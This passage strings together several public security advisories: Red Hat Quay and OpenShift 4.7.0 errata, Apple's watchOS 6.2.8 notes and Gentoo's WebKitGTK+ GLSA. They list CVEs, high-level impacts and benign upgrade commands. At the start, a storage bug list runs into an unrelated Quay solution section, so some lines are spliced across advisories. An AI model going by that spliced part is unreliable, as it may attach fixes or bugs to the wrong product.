1859478 - OCS 4.6 : Upon deployment, CSI Pods in CLBO with error - flag provided but not defined: -metadatastorage
1860022 - OCS 4.6 Deployment: LBP CSV and pod should not be deployed since ob/obc CRDs are owned from OCS 4.5 onwards
1860034 - OCS 4.6 Deployment in ocs-ci : Toolbox pod in ContainerCreationError due to key admin-secret not found
1860670 - OCS 4.5 Uninstall External: Openshift-storage namespace in Terminating state as CephObjectStoreUser had finalizers remaining
1860848 - Add validation for rgw-pool-prefix in the ceph-external-cluster-details-exporter script
1861780 - [Tracker BZ1866386][IBM s390x] Mount Failed for CEPH while running couple of OCS test cases. Solution:
Download the release images via:
quay.io/redhat/quay:v3.3.3
quay.io/redhat/clair-jwt:v3.3.3
quay.io/redhat/quay-builder:v3.3.3
quay.io/redhat/clair:v3.3.3
4. Bugs fixed (https://bugzilla.redhat.com/):
1905758 - CVE-2020-27831 quay: email notifications authorization bypass
1905784 - CVE-2020-27832 quay: persistent XSS in repository notification display
5. JIRA issues fixed (https://issues.jboss.org/):
PROJQUAY-1124 - NVD feed is broken for latest Clair v2 version
6. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-07-15-4 watchOS 6.2.8
watchOS 6.2.8 is now available and addresses the following:
Audio
Available for: Apple Watch Series 1 and later
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9889: JunDong Xie and XingWei Li of Ant-financial Light-Year
Security Lab
Audio
Available for: Apple Watch Series 1 and later
Impact: Processing a maliciously crafted audio file may lead to
arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9888: JunDong Xie and XingWei Li of Ant-financial Light-Year
Security Lab
CVE-2020-9890: JunDong Xie and XingWei Li of Ant-financial Light-Year
Security Lab
CVE-2020-9891: JunDong Xie and XingWei Li of Ant-financial Light-Year
Security Lab
Crash Reporter
Available for: Apple Watch Series 1 and later
Impact: A malicious application may be able to break out of its
sandbox
Description: A memory corruption issue was addressed by removing the
vulnerable code.
CVE-2020-9865: Zhuo Liang of Qihoo 360 Vulcan Team working with 360
BugCloud
GeoServices
Available for: Apple Watch Series 1 and later
Impact: A malicious application may be able to read sensitive
location information
Description: An authorization issue was addressed with improved state
management.
CVE-2020-9933: Min (Spark) Zheng and Xiaolong Bai of Alibaba Inc.
ImageIO
Available for: Apple Watch Series 1 and later
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9936: Mickey Jin of Trend Micro
Kernel
Available for: Apple Watch Series 1 and later
Impact: A malicious application may be able to execute arbitrary code
with system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2020-9923: Proteas
Kernel
Available for: Apple Watch Series 1 and later
Impact: An attacker that has already achieved kernel code execution
may be able to bypass kernel memory mitigations
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9909: Brandon Azad of Google Project Zero
Messages
Available for: Apple Watch Series 1 and later
Impact: A user that is removed from an iMessage group could rejoin
the group
Description: An issue existed in the handling of iMessage tapbacks.
The issue was resolved with additional verification.
CVE-2020-9885: an anonymous researcher, Suryansh Mansharamani, of WWP
High School North (medium.com/@suryanshmansha)
WebKit
Available for: Apple Watch Series 1 and later
Impact: A remote attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9894: 0011 working with Trend Micro Zero Day Initiative
WebKit
Available for: Apple Watch Series 1 and later
Impact: Processing maliciously crafted web content may prevent
Content Security Policy from being enforced
Description: An access issue existed in Content Security Policy.
CVE-2020-9925: an anonymous researcher
WebKit
Available for: Apple Watch Series 1 and later
Impact: A remote attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9893: 0011 working with Trend Micro Zero Day Initiative
CVE-2020-9895: Wen Xu of SSLab, Georgia Tech
WebKit
Available for: Apple Watch Series 1 and later
Impact: A malicious attacker with arbitrary read and write capability
may be able to bypass Pointer Authentication
Description: Multiple issues were addressed with improved logic.
CVE-2020-9910: Samuel Groß of Google Project Zero
WebKit Page Loading
Available for: Apple Watch Series 1 and later
Impact: A malicious attacker may be able to conceal the destination
of a URL
Description: A URL Unicode encoding issue was addressed with improved
state management.
CVE-2020-9916: Rakesh Mane (@RakeshMane10)
WebKit Web Inspector
Available for: Apple Watch Series 1 and later
Impact: Copying a URL from Web Inspector may lead to command
injection
Description: A command injection issue existed in Web Inspector.
CVE-2020-9862: Ophir Lojkine (@lovasoa)
Wi-Fi
Available for: Apple Watch Series 1 and later
Impact: A remote attacker may be able to cause unexpected system
termination or corrupt kernel memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9918: Jianjun Dai of 360 Alpha Lab working with 360 BugCloud
(bugcloud.360.cn)
Additional recognition
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Installation note:
Instructions on how to update your Apple Watch software are
available at https://support.apple.com/kb/HT204641
To check the version on your Apple Watch, open the Apple Watch app
on your iPhone and select "My Watch > General > About".
Alternatively, on your watch, select "My Watch > General > About". - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 202007-61
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: July 31, 2020
Bugs: #734584
ID: 202007-61
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
=======
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which could result in the arbitrary execution of code.
Background
=========
WebKitGTK+ is a full-featured port of the WebKit rendering engine,
suitable for projects requiring any kind of web integration, from
hybrid HTML/CSS applications to full-fledged web browsers.
Affected packages
================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.28.4 >= 2.28.4
Description
==========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Impact
=====
Please review the referenced CVE identifiers for details.
Workaround
=========
There is no known workaround at this time.
Resolution
=========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.28.4"
References
=========
[ 1 ] CVE-2020-9862
https://nvd.nist.gov/vuln/detail/CVE-2020-9862
[ 2 ] CVE-2020-9893
https://nvd.nist.gov/vuln/detail/CVE-2020-9893
[ 3 ] CVE-2020-9894
https://nvd.nist.gov/vuln/detail/CVE-2020-9894
[ 4 ] CVE-2020-9895
https://nvd.nist.gov/vuln/detail/CVE-2020-9895
[ 5 ] CVE-2020-9915
https://nvd.nist.gov/vuln/detail/CVE-2020-9915
[ 6 ] CVE-2020-9925
https://nvd.nist.gov/vuln/detail/CVE-2020-9925
Availability
===========
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/202007-61
Concerns?
========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
======
Copyright 2020 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: OpenShift Container Platform 4.7.0 security, bug fix, and enhancement update
Advisory ID: RHSA-2020:5633-01
Product: Red Hat OpenShift Enterprise
Advisory URL: https://access.redhat.com/errata/RHSA-2020:5633
Issue date: 2021-02-24
CVE Names: CVE-2018-10103 CVE-2018-10105 CVE-2018-14461
CVE-2018-14462 CVE-2018-14463 CVE-2018-14464
CVE-2018-14465 CVE-2018-14466 CVE-2018-14467
CVE-2018-14468 CVE-2018-14469 CVE-2018-14470
CVE-2018-14553 CVE-2018-14879 CVE-2018-14880
CVE-2018-14881 CVE-2018-14882 CVE-2018-16227
CVE-2018-16228 CVE-2018-16229 CVE-2018-16230
CVE-2018-16300 CVE-2018-16451 CVE-2018-16452
CVE-2018-20843 CVE-2019-3884 CVE-2019-5018
CVE-2019-6977 CVE-2019-6978 CVE-2019-8625
CVE-2019-8710 CVE-2019-8720 CVE-2019-8743
CVE-2019-8764 CVE-2019-8766 CVE-2019-8769
CVE-2019-8771 CVE-2019-8782 CVE-2019-8783
CVE-2019-8808 CVE-2019-8811 CVE-2019-8812
CVE-2019-8813 CVE-2019-8814 CVE-2019-8815
CVE-2019-8816 CVE-2019-8819 CVE-2019-8820
CVE-2019-8823 CVE-2019-8835 CVE-2019-8844
CVE-2019-8846 CVE-2019-9455 CVE-2019-9458
CVE-2019-11068 CVE-2019-12614 CVE-2019-13050
CVE-2019-13225 CVE-2019-13627 CVE-2019-14889
CVE-2019-15165 CVE-2019-15166 CVE-2019-15903
CVE-2019-15917 CVE-2019-15925 CVE-2019-16167
CVE-2019-16168 CVE-2019-16231 CVE-2019-16233
CVE-2019-16935 CVE-2019-17450 CVE-2019-17546
CVE-2019-18197 CVE-2019-18808 CVE-2019-18809
CVE-2019-19046 CVE-2019-19056 CVE-2019-19062
CVE-2019-19063 CVE-2019-19068 CVE-2019-19072
CVE-2019-19221 CVE-2019-19319 CVE-2019-19332
CVE-2019-19447 CVE-2019-19524 CVE-2019-19533
CVE-2019-19537 CVE-2019-19543 CVE-2019-19602
CVE-2019-19767 CVE-2019-19770 CVE-2019-19906
CVE-2019-19956 CVE-2019-20054 CVE-2019-20218
CVE-2019-20386 CVE-2019-20387 CVE-2019-20388
CVE-2019-20454 CVE-2019-20636 CVE-2019-20807
CVE-2019-20812 CVE-2019-20907 CVE-2019-20916
CVE-2020-0305 CVE-2020-0444 CVE-2020-1716
CVE-2020-1730 CVE-2020-1751 CVE-2020-1752
CVE-2020-1971 CVE-2020-2574 CVE-2020-2752
CVE-2020-2922 CVE-2020-3862 CVE-2020-3864
CVE-2020-3865 CVE-2020-3867 CVE-2020-3868
CVE-2020-3885 CVE-2020-3894 CVE-2020-3895
CVE-2020-3897 CVE-2020-3898 CVE-2020-3899
CVE-2020-3900 CVE-2020-3901 CVE-2020-3902
CVE-2020-6405 CVE-2020-7595 CVE-2020-7774
CVE-2020-8177 CVE-2020-8492 CVE-2020-8563
CVE-2020-8566 CVE-2020-8619 CVE-2020-8622
CVE-2020-8623 CVE-2020-8624 CVE-2020-8647
CVE-2020-8648 CVE-2020-8649 CVE-2020-9327
CVE-2020-9802 CVE-2020-9803 CVE-2020-9805
CVE-2020-9806 CVE-2020-9807 CVE-2020-9843
CVE-2020-9850 CVE-2020-9862 CVE-2020-9893
CVE-2020-9894 CVE-2020-9895 CVE-2020-9915
CVE-2020-9925 CVE-2020-10018 CVE-2020-10029
CVE-2020-10732 CVE-2020-10749 CVE-2020-10751
CVE-2020-10763 CVE-2020-10773 CVE-2020-10774
CVE-2020-10942 CVE-2020-11565 CVE-2020-11668
CVE-2020-11793 CVE-2020-12465 CVE-2020-12655
CVE-2020-12659 CVE-2020-12770 CVE-2020-12826
CVE-2020-13249 CVE-2020-13630 CVE-2020-13631
CVE-2020-13632 CVE-2020-14019 CVE-2020-14040
CVE-2020-14381 CVE-2020-14382 CVE-2020-14391
CVE-2020-14422 CVE-2020-15157 CVE-2020-15503
CVE-2020-15862 CVE-2020-15999 CVE-2020-16166
CVE-2020-24490 CVE-2020-24659 CVE-2020-25211
CVE-2020-25641 CVE-2020-25658 CVE-2020-25661
CVE-2020-25662 CVE-2020-25681 CVE-2020-25682
CVE-2020-25683 CVE-2020-25684 CVE-2020-25685
CVE-2020-25686 CVE-2020-25687 CVE-2020-25694
CVE-2020-25696 CVE-2020-26160 CVE-2020-27813
CVE-2020-27846 CVE-2020-28362 CVE-2020-29652
CVE-2021-2007 CVE-2021-3121
=====================================================================
1. Summary:
Red Hat OpenShift Container Platform release 4.7.0 is now available.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing
Kubernetes application platform solution designed for on-premise or private
cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container
Platform 4.7.0. See the following advisory for the RPM packages for this
release:
https://access.redhat.com/errata/RHSA-2020:5634
Space precludes documenting all of the container images in this advisory.
See the following Release Notes documentation, which will be updated
shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
You may download the oc tool and use it to inspect release image metadata
as follows:
(For x86_64 architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.0-x86_64
The image digest is
sha256:d74b1cfa81f8c9cc23336aee72d8ae9c9905e62c4874b071317a078c316f8a70
(For s390x architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.0-s390x
The image digest is
sha256:a68ca03d87496ddfea0ac26b82af77231583a58a7836b95de85efe5e390ad45d
(For ppc64le architecture)
$ oc adm release info
quay.io/openshift-release-dev/ocp-release:4.7.0-ppc64le
The image digest is
sha256:bc7b04e038c8ff3a33b827f4ee19aa79b26e14c359a7dcc1ced9f3b58e5f1ac6
All OpenShift Container Platform 4.7 users are advised to upgrade to these
updated packages and images when they are available in the appropriate
release channel. To check for available updates, use the OpenShift Console
or the CLI oc command. Instructions for upgrading a cluster are available
at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -between-minor.html#understanding-upgrade-channels_updating-cluster-between
- -minor.
Security Fix(es):
* crewjam/saml: authentication bypass in saml authentication
(CVE-2020-27846)
* golang: crypto/ssh: crafted authentication request can lead to nil
pointer dereference (CVE-2020-29652)
* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index
validation (CVE-2021-3121)
* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)
* kubernetes: Secret leaks in kube-controller-manager when using vSphere
Provider (CVE-2020-8563)
* containernetworking/plugins: IPv6 router advertisements allow for MitM
attacks on IPv4 clusters (CVE-2020-10749)
* heketi: gluster-block volume password details available in logs
(CVE-2020-10763)
* golang.org/x/text: possibility to trigger an infinite loop in
encoding/unicode could lead to crash (CVE-2020-14040)
* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)
* golang-github-gorilla-websocket: integer overflow leads to denial of
service (CVE-2020-27813)
* golang: math/big: panic during recursive division of very large numbers
(CVE-2020-28362)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
3. Solution:
For OpenShift Container Platform 4.7, see the following documentation,
which
will be updated shortly for this release, for important instructions on how
to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
Details on how to access this content are available at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -cli.html.
4. Bugs fixed (https://bugzilla.redhat.com/):
1620608 - Restoring deployment config with history leads to weird state
1752220 - [OVN] Network Policy fails to work when project label gets overwritten
1756096 - Local storage operator should implement must-gather spec
1756173 - /etc/udev/rules.d/66-azure-storage.rules missing from initramfs
1768255 - installer reports 100% complete but failing components
1770017 - Init containers restart when the exited container is removed from node.
1775057 - [MSTR-485] Cluster is abnormal after etcd backup/restore when the backup is conducted during etcd encryption is migrating
1775444 - RFE: k8s cpu manager does not restrict /usr/bin/pod cpuset
1777038 - Cluster scaled beyond host subnet limits does not fire alert or cleanly report why it cannot scale
1777224 - InfraID in metadata.json and .openshift_install_state.json is not consistent when repeating `create` commands
1784298 - "Displaying with reduced resolution due to large dataset." would show under some conditions
1785399 - Under condition of heavy pod creation, creation fails with 'error reserving pod name ...: name is reserved"
1797766 - Resource Requirements" specDescriptor fields - CPU and Memory injects empty string YAML editor
1801089 - [OVN] Installation failed and monitoring pod not created due to some network error.
1805025 - [OSP] Machine status doesn't become "Failed" when creating a machine with invalid image
1805639 - Machine status should be "Failed" when creating a machine with invalid machine configuration
1806000 - CRI-O failing with: error reserving ctr name
1806915 - openshift-service-ca: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be
1806917 - openshift-service-ca-operator: Some core components are in openshift.io/run-level 1 and are bypassing SCC, but should not be
1810438 - Installation logs are not gathered from OCP nodes
1812085 - kubernetes-networking-namespace-pods dashboard doesn't exist
1812412 - Monitoring Dashboard: on restricted cluster, query timed out in expression evaluation
1813012 - EtcdDiscoveryDomain no longer needed
1813949 - openshift-install doesn't use env variables for OS_* for some of API endpoints
1816812 - OpenShift test suites are not resilient to rate limited registries (like docker.io) and cannot control their dependencies for offline use
1819053 - loading OpenAPI spec for "v1beta1.metrics.k8s.io" failed with: OpenAPI spec does not exist
1819457 - Package Server is in 'Cannot update' status despite properly working
1820141 - [RFE] deploy qemu-quest-agent on the nodes
1822744 - OCS Installation CI test flaking
1824038 - Integration Tests: StaleElementReferenceError in OLM single-installmode scenario
1825892 - StorageClasses and PVs are not cleaned completely after running the csi verification tool
1826301 - Wrong NodeStatus reports in file-integrity scan when configuration error in aide.conf file
1829723 - User workload monitoring alerts fire out of the box
1832968 - oc adm catalog mirror does not mirror the index image itself
1833012 - Lower OVNKubernetes HTTP E/W performance compared with OpenShiftSDN
1833220 - CVE-2020-10749 containernetworking/plugins: IPv6 router advertisements allow for MitM attacks on IPv4 clusters
1834995 - olmFull suite always fails once th suite is run on the same cluster
1836017 - vSphere UPI: Both Internal and External load balancers for kube-apiserver should use /readyz
1837953 - Replacing masters doesn't work for ovn-kubernetes 4.4
1838352 - OperatorExited, Pending marketplace-operator-... pod for several weeks
1838751 - [oVirt][Tracker] Re-enable skipped network tests
1839239 - csi-snapshot-controller flickers Degraded=True on etcd hiccups
1840759 - [aws-ebs-csi-driver] The volume created by aws ebs csi driver can not be deleted when the cluster is destroyed
1841039 - authentication-operator: Add e2e test for password grants to Keycloak being set as OIDC IdP
1841119 - Get rid of config patches and pass flags directly to kcm
1841175 - When an Install Plan gets deleted, OLM does not create a new one
1841381 - Issue with memoryMB validation
1841885 - oc adm catalog mirror command attempts to pull from registry.redhat.io when using --from-dir option
1844727 - Etcd container leaves grep and lsof zombie processes
1845387 - CVE-2020-10763 heketi: gluster-block volume password details available in logs
1847074 - Filter bar layout issues at some screen widths on search page
1848358 - CRDs with preserveUnknownFields:true don't reflect in status that they are non-structural
1849543 - [4.5]kubeletconfig's description will show multiple lines for finalizers when upgrade from 4.4.8->4.5
1851103 - Use of NetworkManager-wait-online.service in rhcos-growpart.service
1851203 - [GSS] [RFE] Need a simpler representation of capactiy breakdown in total usage and per project breakdown in OCS 4 dashboard
1851351 - OCP 4.4.9: EtcdMemberIPMigratorDegraded: rpc error: code = Canceled desc = grpc: the client connection is closing
1851693 - The `oc apply` should return errors instead of hanging there when failing to create the CRD
1852289 - Upgrade testsuite fails on ppc64le environment - Unsupported LoadBalancer service
1853115 - the restriction of --cloud option should be shown in help text.
1853116 - `--to` option does not work with `--credentials-requests` flag.
1853352 - [v2v][UI] Storage Class fields Should Not be empty in VM disks view
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1854567 - "Installed Operators" list showing "duplicated" entries during installation
1855325 - [Feature:Prometheus][Conformance] Prometheus when installed on the cluster [Top Level] [Feature:Prometheus][Conformance] Prometheus when installed on the cluster should report telemetry if a cloud.openshift.com token is present
1855351 - Inconsistent Installer reactions to Ctrl-C during user input process
1855408 - OVN cluster unstable after running minimal scale test
1856351 - Build page should show metrics for when the build ran, not the last 30 minutes
1856354 - New APIServices missing from OpenAPI definitions
1857446 - ARO/Azure: excessive pod memory allocation causes node lockup
1857877 - Operator upgrades can delete existing CSV before completion
1858578 - [v2v] [ui] VM import RHV to CNV Target VM Name longer than 63 chars should not be allowed
1859174 - [IPI][OSP] Having errors from 4.3 to 4.6 about Security group rule already created
1860136 - default ingress does not propagate annotations to route object on update
1860322 - [OCPv4.5.2] after unexpected shutdown one of RHV Hypervisors, OCP worker nodes machine are marked as "Failed"
1860518 - unable to stop a crio pod
1861383 - Route with `haproxy.router.openshift.io/timeout: 365d` kills the ingress controller
1862430 - LSO: PV creation lock should not be acquired in a loop
1862489 - LSO autoprovisioning should exclude top level disks that are part of LVM volume group.
1862608 - Virtual media does not work on hosts using BIOS, only UEFI
1862918 - [v2v] User should only select SRIOV network when importin vm with SRIOV network
1865743 - Some pods are stuck in ContainerCreating and some sdn pods are in CrashLoopBackOff
1865839 - rpm-ostree fails with "System transaction in progress" when moving to kernel-rt
1866043 - Configurable table column headers can be illegible
1866087 - Examining agones helm chart resources results in "Oh no!"
1866261 - Need to indicate the intentional behavior for Ansible in the `create api` help info
1866298 - [RHOCS Usability Study][Installation] Labeling the namespace should be a part of the installation flow or be clearer as a requirement
1866320 - [RHOCS Usability Study][Dashboard] Users were confused by Available Capacity and the Total Capacity
1866334 - [RHOCS Usability Study][Installation] On the Operator installation page, there’s no indication on which labels offer tooltip/help
1866340 - [RHOCS Usability Study][Dashboard] It was not clear why “No persistent storage alerts” was prominently displayed
1866343 - [RHOCS Usability Study][Dashboard] User wanted to know the time frame for Data Consumption, e.g I/O Operations
1866445 - kola --basic-qemu-scenarios scenario fail on ppc64le & s390x
1866482 - Few errors are seen when oc adm must-gather is run
1866605 - No metadata.generation set for build and buildconfig objects
1866873 - MCDDrainError "Drain failed on , updates may be blocked" missing rendered node name
1866901 - Deployment strategy for BMO allows multiple pods to run at the same time
1866925 - openshift-install destroy cluster should fail quickly when provided with invalid credentials on Azure.
1867165 - Cannot assign static address to baremetal install bootstrap vm
1867380 - When using webhooks in OCP 4.5 fails to rollout latest deploymentconfig
1867400 - [OCs 4.5]UI should not allow creation of second storagecluster of different mode in a single OCS
1867477 - HPA monitoring cpu utilization fails for deployments which have init containers
1867518 - [oc] oc should not print so many goroutines when ANY command fails
1867608 - ds/machine-config-daemon takes 100+ minutes to rollout on 250 node cluster
1867965 - OpenShift Console Deployment Edit overwrites deployment yaml
1868004 - opm index add appears to produce image with wrong registry server binary
1868065 - oc -o jsonpath prints possible warning / bug "Unable to decode server response into a Table"
1868104 - Baremetal actuator should not delete Machine objects
1868125 - opm index add is not creating an index with valid images when --permissive flag is added, the index is empty instead
1868384 - CLI does not save login credentials as expected when using the same username in multiple clusters
1868527 - OpenShift Storage using VMWare vSAN receives error "Failed to add disk 'scsi0:2'" when mounted pod is created on separate node
1868645 - After a disaster recovery pods a stuck in "NodeAffinity" state and not running
1868748 - ClusterProvisioningIP in baremetal platform has wrong JSON annotation
1868765 - [vsphere][ci] could not reserve an IP address: no available addresses
1868770 - catalogSource named "redhat-operators" deleted in a disconnected cluster
1868976 - Prometheus error opening query log file on EBS backed PVC
1869293 - The configmap name looks confusing in aide-ds pod logs
1869606 - crio's failing to delete a network namespace
1870337 - [sig-storage] Managed cluster should have no crashlooping recycler pods over four minutes
1870342 - [sig-scheduling] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run [Conformance]
1870373 - Ingress Operator reports available when DNS fails to provision
1870467 - D/DC Part of Helm / Operator Backed should not have HPA
1870728 - openshift-install creates expired ignition files from stale .openshift_install_state.json
1870800 - [4.6] Managed Column not appearing on Pods Details page
1871170 - e2e tests are needed to validate the functionality of the etcdctl container
1872001 - EtcdDiscoveryDomain no longer needed
1872095 - content are expanded to the whole line when only one column in table on Resource Details page
1872124 - Could not choose device type as "disk" or "part" when create localvolumeset from web console
1872128 - Can't run container with hostPort on ipv6 cluster
1872166 - 'Silences' link redirects to unexpected 'Alerts' view after creating a silence in the Developer perspective
1872251 - [aws-ebs-csi-driver] Verify job in CI doesn't check for vendor dir sanity
1872786 - Rules in kube-apiserver.rules are taking too long and consuming too much memory for Prometheus to evaluate them
1872821 - [DOC] Typo in Ansible Operator Tutorial
1872907 - Fail to create CR from generated Helm Base Operator
1872923 - Click "Cancel" button on the "initialization-resource" creation form page should send users to the "Operator details" page instead of "Install Operator" page (previous page)
1873007 - [downstream] failed to read config when running the operator-sdk in the home path
1873030 - Subscriptions without any candidate operators should cause resolution to fail
1873043 - Bump to latest available 1.19.x k8s
1873114 - Nodes goes into NotReady state (VMware)
1873288 - Changing Cluster-Wide Pull Secret Does Not Trigger Updates In Kubelet Filesystem
1873305 - Failed to power on /inspect node when using Redfish protocol
1873326 - Accessibility - The symbols e.g checkmark in the overview page has no text description, label, or other accessible information
1873480 - Accessibility - No text description, alt text, label, or other accessible information associated with the help icon: “?” button/icon in Developer Console ->Navigation
1873556 - [Openstack] HTTP_PROXY setting for NetworkManager-resolv-prepender not working
1873593 - MCO fails to cope with ContainerRuntimeConfig thas has a name > 63 characters
1874057 - Pod stuck in CreateContainerError - error msg="container_linux.go:348: starting container process caused \"chdir to cwd (\\\"/mount-point\\\") set in config.json failed: permission denied\""
1874074 - [CNV] Windows 2019 Default Template Not Defaulting to Proper NIC/Storage Driver
1874192 - [RFE] "Create Backing Store" page doesn't allow to select already defined k8s secret as target bucket credentials when Google Cloud Storage is selected as a provider
1874240 - [vsphere] unable to deprovision - Runtime error list attached objects
1874248 - Include validation for vcenter host in the install-config
1874340 - vmware: NodeClockNotSynchronising alert is triggered in openshift cluster after upgrading form 4.4.16 to 4.5.6
1874583 - apiserver tries and fails to log an event when shutting down
1874584 - add retry for etcd errors in kube-apiserver
1874638 - Missing logging for nbctl daemon
1874736 - [downstream] no version info for the helm-operator
1874901 - add utm_source parameter to Red Hat Marketplace URLs for attribution
1874968 - Accessibility: The project selection drop down is a keyboard trap
1875247 - Dependency resolution error "found more than one head for channel" is unhelpful for users
1875516 - disabled scheduling is easy to miss in node page of OCP console
1875598 - machine status is Running for a master node which has been terminated from the console
1875806 - When creating a service of type "LoadBalancer" (Kuryr,OVN) communication through this loadbalancer failes after 2-5 minutes.
1876166 - need to be able to disable kube-apiserver connectivity checks
1876469 - Invalid doc link on yaml template schema description
1876701 - podCount specDescriptor change doesn't take effect on operand details page
1876815 - Installer uses the environment variable OS_CLOUD for manifest generation despite explicit prompt
1876935 - AWS volume snapshot is not deleted after the cluster is destroyed
1877071 - vSphere IPI - Nameserver limits were exceeded, some nameservers have been omitted
1877105 - add redfish to enabled_bios_interfaces
1877116 - e2e aws calico tests fail with `rpc error: code = ResourceExhausted`
1877273 - [OVN] EgressIP cannot fail over to available nodes after one egressIP node shutdown
1877648 - [sriov]VF from allocatable and capacity of node is incorrect when the policy is only 'rootDevices'
1877681 - Manually created PV can not be used
1877693 - dnsrecords specify recordTTL as 30 but the value is null in AWS Route 53
1877740 - RHCOS unable to get ip address during first boot
1877812 - [ROKS] IBM cloud failed to terminate OSDs when upgraded between internal builds of OCS 4.5
1877919 - panic in multus-admission-controller
1877924 - Cannot set BIOS config using Redfish with Dell iDracs
1878022 - Met imagestreamimport error when import the whole image repository
1878086 - OCP 4.6+OCS 4.6(multiple SC) Internal Mode- UI should populate the default "Filesystem Name" instead of providing a textbox, & the name should be validated
1878301 - [4.6] [UI] Unschedulable used to always be displayed when Node is Ready status
1878701 - After deleting and recreating a VM with same name, the VM events contain the events from the old VM
1878766 - CPU consumption on nodes is higher than the CPU count of the node.
1878772 - On the nodes there are up to 547 zombie processes caused by thanos and Prometheus.
1878823 - "oc adm release mirror" generating incomplete imageContentSources when using "--to" and "--to-release-image"
1878845 - 4.5 to 4.6.rc.4 upgrade failure: authentication operator health check connection refused for multitenant mode
1878900 - Installer complains about not enough vcpu for the baremetal flavor where generic bm flavor is being used
1878953 - RBAC error shows when normal user access pvc upload page
1878956 - `oc api-resources` does not include API version
1878972 - oc adm release mirror removes the architecture information
1879013 - [RFE]Improve CD-ROM interface selection
1879056 - UI should allow to change or unset the evictionStrategy
1879057 - [CSI Certificate Test] Test failed for CSI certification tests for CSIdriver openshift-storage.rbd.csi.ceph.com with RWX enabled
1879094 - RHCOS dhcp kernel parameters not working as expected
1879099 - Extra reboot during 4.5 -> 4.6 upgrade
1879244 - Error adding container to network "ipvlan-host-local": "master" field is required
1879248 - OLM Cert Dir for Webhooks does not align SDK/Kubebuilder
1879282 - Update OLM references to point to the OLM's new doc site
1879283 - panic after nil pointer dereference in pkg/daemon/update.go
1879365 - Overlapping, divergent openshift-cluster-storage-operator manifests
1879419 - [RFE]Improve boot source description for 'Container' and ‘URL’
1879430 - openshift-object-counts quota is not dynamically updating as the resource is deleted.
1879565 - IPv6 installation fails on node-valid-hostname
1879777 - Overlapping, divergent openshift-machine-api namespace manifests
1879878 - Messages flooded in thanos-querier pod- oauth-proxy container: Authorization header does not start with 'Basic', skipping basic authentication in Log message in thanos-querier pod the oauth-proxy
1879930 - Annotations shouldn't be removed during object reconciliation
1879976 - No other channel visible from console
1880068 - image pruner is not aware of image policy annotation, StatefulSets, etc.
1880148 - dns daemonset rolls out slowly in large clusters
1880161 - Actuator Update calls should have fixed retry time
1880259 - additional network + OVN network installation failed
1880389 - Pipeline Runs with skipped Tasks incorrectly show Tasks as "Failed"
1880410 - Convert Pipeline Visualization node to SVG
1880417 - [vmware] Fail to boot with Secure Boot enabled, kernel lockdown denies iopl access to afterburn
1880443 - broken machine pool management on OpenStack
1880450 - Host failed to install because its installation stage joined took longer than expected 20m0s.
1880473 - IBM Cloudpak operators installation stuck "UpgradePending" with InstallPlan status updates failing due to size limitation
1880680 - [4.3] [Tigera plugin] - openshift-kube-proxy fails - Failed to execute iptables-restore: exit status 4 (iptables-restore v1.8.4 (nf_tables)
1880785 - CredentialsRequest missing description in `oc explain`
